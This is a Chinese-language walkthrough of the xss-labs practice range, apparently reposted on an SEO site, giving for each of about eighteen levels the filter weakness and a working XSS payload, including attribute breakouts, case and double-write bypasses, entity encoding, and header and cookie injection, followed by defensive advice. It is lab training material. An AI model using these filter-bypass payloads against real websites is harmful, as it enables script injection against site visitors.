当前位置: 首页 > wzjs >正文

上海找做网站公司哪家好企业网络营销策划方案

wzjs 2025/8/6 15:21:25
上海找做网站公司哪家好,企业网络营销策划方案,做视频网站需要哪些手续,盐城网站建设渠道合作声明 文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为! 靶场部署与工具推荐 环境搭建:使用PHPStudy部署,源码从GitHub下载。测试工具:Burp Suite(抓包…

声明

文中涉及操作均来自靶机虚拟环境,禁止用于真实环境,任何未经授权的渗透测试都是违法行为!

靶场部署与工具推荐

  • 环境搭建:使用PHPStudy部署,源码从GitHub下载。
  • 测试工具:Burp Suite(抓包)、ExifTool(修改EXIF)、XSStrike(自动化检测)。

https://github.com/do0dl3/xss-labs下载 xss-labs,

解压后放到 phpstudy_pro 的 WWW 目录下,重命名为 xss-labs

之后访问 http://localhost/xss-labs/

1. Level 1(直接注入)

漏洞点:GET参数name未过滤直接输出到HTML。

Payload<script>alert('xss')</script>

原理:服务端未转义用户输入,直接拼接至<h2>标签中。

2. Level 2(闭合属性值)

漏洞点:输入框的value属性未过滤,但<h2>内容被转义。

Payload"><script>alert(1)</script>

技巧:闭合value的双引号,利用未过滤的输入点注入脚本。

3. Level 3(事件触发绕过)

漏洞点<>被转义,但单引号未过滤。

Payload' onfocus=javascript:alert() '

原理:通过onfocus事件在输入框获得焦点时触发脚本。

4. Level 4(双引号闭合)

漏洞点:双引号闭合属性值,过滤逻辑与Level 3相反。

Payload" onfocus=javascript:alert() "

技巧:调整引号类型以适应服务端过滤规则。

5. Level 5(<a>标签利用)

漏洞点onscript被过滤为o_nscr_ipt

Payload"><a href="javascript:alert(1)">xss</a><"

绕过:利用<a>标签的href属性执行JavaScript伪协议。

6. Level 6(大小写绕过)

漏洞点:关键字过滤未统一大小写。

Payload"><sCript>alert()</sCript><"

技巧:通过混合大小写绕过黑名单检测。

7. Level 7(双写绕过)

漏洞点script被替换为空,但仅过滤一次。

Payload"><scscriptript>alert()</scscriptript><"

原理:双写敏感词使过滤后仍保留有效字符。

8. Level 8(html 实体编码)

漏洞点href属性自动解码Unicode。

Payloadjavascript:alert(1)编码为&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;

工具:使用在线编码工具转换关键字符。

9. Level 9(注释符绕过)

漏洞点:强制要求参数包含http://

Payloadjavascript:alert()/*http://*/

技巧:添加注释符绕过字符串检测。

10. Level 10(隐藏表单注入)

漏洞点:通过隐藏的t_sort参数注入事件。

Payload?t_sort=" onfocus=alert() type="text

原理:修改隐藏表单属性为可见并触发事件。

11. Level 11(Referer头注入)

漏洞点Referer头未过滤写入隐藏表单。

Payload:修改HTTP头为Referer: " onfocus=alert() type="text

12. Level 12(User-Agent注入)

漏洞点User-Agent头未过滤。

Payload:同Level 11,修改User-Agent字段。

13. Level 13(Cookie注入)

漏洞点:Cookie值未过滤写入页面。

Payload:设置Cookie为user=" onfocus=alert() type="text

14. Level 14(EXIF XSS)

漏洞点:图片EXIF信息未过滤。

方法:使用工具(如ExifTool)在图片元数据中插入脚本。

15. Level 15

漏洞点ng-include指令包含外部页面。

Payload?src='level1.php?name=<img src=x onerror=alert(1)>'

16. Level 16(空格与换行符)

漏洞点:空格被编码为&nbsp;,换行符保留。

Payload<img%0asrc=x%0aonerror=alert(1)>

17. Level 17-18(Flash XSS)

漏洞点:Flash未过滤参数,闭合标签属性。

Payload?arg01=a&arg02= onmouseover=alert(1)

三、防御思路总结

  1. 输入过滤:使用白名单限制特殊字符(如<, >)。
  2. 输出编码:根据上下文转义HTML/JS(如<转为&lt;)。
  3. HTTP安全头
Content-Security-Policy: script-src 'self';
Set-Cookie: HttpOnly; Secure
  1. 框架安全:避免直接使用v-htmlinnerHTML等危险API。
http://www.dtcms.com/wzjs/242262.html

相关文章:

  • 网站开发要学java吗成都网络优化托管公司
  • 网络营销能干什么工作秦洁婷seo博客
  • 怎么用lls做网站推广项目
  • 怎样建设网站内容b站推广
  • 武汉网站的制作sem营销推广
  • 中国那个公司的网站做的最好搜索引擎推广是什么意思
  • 传奇网站怎么做google 优化推广
  • 网站建设logo企业查询平台
  • 如何在网站上做标记圈信息注册商标查询官网入口
  • 网站栏目策划 有思想的新闻网站建设哪个公司好
  • 团购网站 模板网站策划是什么
  • 网站建设合同服务范围seo数据统计分析工具有哪些
  • 抗击疫情网页设计素材广州seo推荐
  • 大连网络营销招聘网宁波seo网络优化公司
  • 网站ftp做网站的会给嘛百度推广投诉电话客服24小时
  • wordpress域名 文件夹西安seo技术
  • 日照网站建设哪家好百度seo手机
  • 长垣网站建设百度移动权重
  • 网站的行为怎么做最新军事动态
  • 如何在虚拟空间上做多个网站哪里做网络推广
  • 龙岗网站制作公司免费软文发布平台
  • phpstudy如何搭建网站苏州关键词优化软件
  • 网站建设 备案什么意思网站设计公司排名
  • wordpress获取bannerseo顾问能赚钱吗
  • 网站建设www.com做电商如何起步
  • 东莞微网站建设服务seo怎么发文章 seo发布工具
  • 建设网站什么软件好新站seo竞价
  • 网站开发的具体流程网站维护收费标准
  • 原创文章网站武汉网络推广自然排名
  • wordpress汽车模板seo优化公司哪家好